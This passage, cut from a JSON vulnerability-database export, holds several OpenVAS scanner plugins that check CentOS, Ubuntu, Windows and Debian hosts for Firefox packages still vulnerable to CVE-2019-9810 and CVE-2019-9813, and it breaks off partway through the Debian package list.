about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section.\");\n\n script_tag(name:\"affected\", value:\"'firefox' package(s) on CentOS 7.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"CentOS7\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~60.6.1~1.el7.centos\", rls:\"CentOS7\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "description": "The remote host is missing an update for the ", "modified": "2019-05-01T00:00:00", "published": "2019-03-28T00:00:00", "id": "OPENVAS:1361412562310843943", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843943", "type": "openvas", "title": "Ubuntu Update for firefox USN-3919-1", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; 
without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843943\");\n script_version(\"2019-05-01T16:02:02+0000\");\n script_cve_id(\"CVE-2019-9810\", \"CVE-2019-9813\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-01 16:02:02 +0000 (Wed, 01 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-03-28 13:46:09 +0000 (Thu, 28 Mar 2019)\");\n script_name(\"Ubuntu Update for firefox USN-3919-1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|18\\.04 LTS|18\\.10|16\\.04 LTS)\");\n\n script_xref(name:\"USN\", value:\"3919-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3919-1/\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'firefox'\n package(s) announced via the USN-3919-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Two security issues were discovered in the JavaScript engine in Firefox.\nIf a user were tricked in to opening a specially crafted website, an\nattacker could exploit this by causing a denial of service, or executing\narbitrary code.\");\n\n script_tag(name:\"affected\", 
value:\"'firefox' package(s) on Ubuntu 18.10,\n Ubuntu 18.04 LTS,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"UBUNTU14.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"firefox\", ver:\"66.0.1+build1-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU18.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"firefox\", ver:\"66.0.1+build1-0ubuntu0.18.04.1\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU18.10\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"firefox\", ver:\"66.0.1+build1-0ubuntu0.18.10.1\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU16.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"firefox\", ver:\"66.0.1+build1-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-19T21:46:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "description": "This host is installed with Mozilla Firefox ESR\n and is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", 
"published": "2019-03-26T00:00:00", "id": "OPENVAS:1361412562310814946", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814946", "type": "openvas", "title": "Mozilla Firefox ESR Security Updates(mfsa_2019-09_2019-10)-Windows", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\nCPE = \"cpe:/a:mozilla:firefox_esr\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814946\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2019-9810\", \"CVE-2019-9813\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-03-26 11:36:16 +0530 (Tue, 26 Mar 2019)\");\n script_name(\"Mozilla Firefox ESR Security Updates(mfsa_2019-09_2019-10)-Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Mozilla Firefox ESR\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a 
vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exists due to,\n\n - IonMonkey MArraySlice has incorrect alias information and\n\n - Ionmonkey type confusion with __proto__ mutations..\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code and cause denial of service.\");\n\n script_tag(name:\"affected\", value:\"Mozilla Firefox ESR version before 60.6.1 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Mozilla Firefox ESR version 60.6.1 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2019-10/\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_firefox_detect_win.nasl\");\n script_mandatory_keys(\"Firefox-ESR/Win/Ver\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nffVer = infos['version'];\nffPath = infos['location'];\n\nif(version_is_less(version:ffVer, test_version:\"60.6.1\"))\n{\n report = report_fixed_ver(installed_version:ffVer, fixed_version:\"60.6.1\", install_path:ffPath);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "description": "The remote host is missing an update for the ", "modified": "2019-05-01T00:00:00", "published": "2019-03-23T00:00:00", "id": "OPENVAS:1361412562310704417", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704417", "type": 
"openvas", "title": "Debian Security Advisory DSA 4417-1 (firefox-esr - security update)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704417\");\n script_version(\"2019-05-01T16:02:02+0000\");\n script_cve_id(\"CVE-2019-9810\", \"CVE-2019-9813\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-01 16:02:02 +0000 (Wed, 01 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-03-23 22:00:00 +0000 (Sat, 23 Mar 2019)\");\n script_name(\"Debian Security Advisory DSA 4417-1 (firefox-esr - security update)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n\n script_xref(name:\"URL\", 
value:\"https://www.debian.org/security/2019/dsa-4417.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DSA-4417-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'firefox-esr'\n package(s) announced via the DSA-4417-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple security issues have been found in the Mozilla Firefox web\nbrowser, which could potentially result in the execution of arbitrary\ncode.\");\n\n script_tag(name:\"affected\", value:\"'firefox-esr' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For the stable distribution (stretch), these problems have been fixed in\nversion 60.6.1esr-1~deb9u1.\n\nWe recommend that you upgrade your firefox-esr packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-dev\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ach\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-af\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-all\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-an\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ar\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += 
res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-as\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ast\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-az\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-be\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-bg\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-bn-bd\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-bn-in\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-br\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-bs\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ca\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-cak\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-cs\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-cy\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-da\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-de\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-dsb\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += 
res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-el\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-en-gb\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-en-za\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-eo\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-ar\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-cl\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-es\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-mx\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-et\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-eu\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-fa\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ff\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-fi\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-fr\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-fy-nl\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ga-ie\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n 
report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-gd\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-gl\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-gn\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-gu-in\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-he\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-hi-in\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-hr\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-hsb\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-hu\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-hy-am\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ia\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-id\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-is\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-it\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ja\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ka\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n 
report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-kab\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-kk\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-km\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-kn\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ko\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-lij\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-lt\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-lv\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-mai\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-mk\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ml\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-mr\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ms\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-my\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-nb-no\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ne-np\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report 
+= res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-nl\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-nn-no\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-oc\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-or\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-pa-in\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-pl\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-pt-br\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-pt-pt\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-rm\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ro\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ru\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-si\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-sk\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-sl\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-son\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-sq\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += 
res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-sr\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-sv-se\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ta\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-te\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-th\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-tr\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-uk\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ur\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-uz\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-vi\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-xh\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-zh-cn\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-zh-tw\", 